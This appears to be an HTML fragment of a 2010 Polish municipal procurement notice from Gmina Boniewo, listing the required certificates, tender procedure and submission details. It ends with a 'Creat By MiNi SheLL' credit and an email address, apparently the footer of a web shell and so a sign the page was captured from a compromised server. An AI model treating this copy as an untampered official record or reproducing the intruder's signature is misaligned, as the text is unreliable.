<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Atesty oraz certyfikaty na materiały wykorzystane w realizacji zadania oraz wyposażenie</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.boniewo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> urząd Gminy Boniewo, ul. Szkolna 28,p-ta 87-851 Boniewo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.07.2010 godzina 10:00, miejsce: urząd gminy Boniewo, ul. szkolna 28, p-ta 87-851 Boniewo -sekretariat urzędu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> zadanie dofinansowane z budżetu Samorządu Województwa Kujawsko-Pomorskiego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com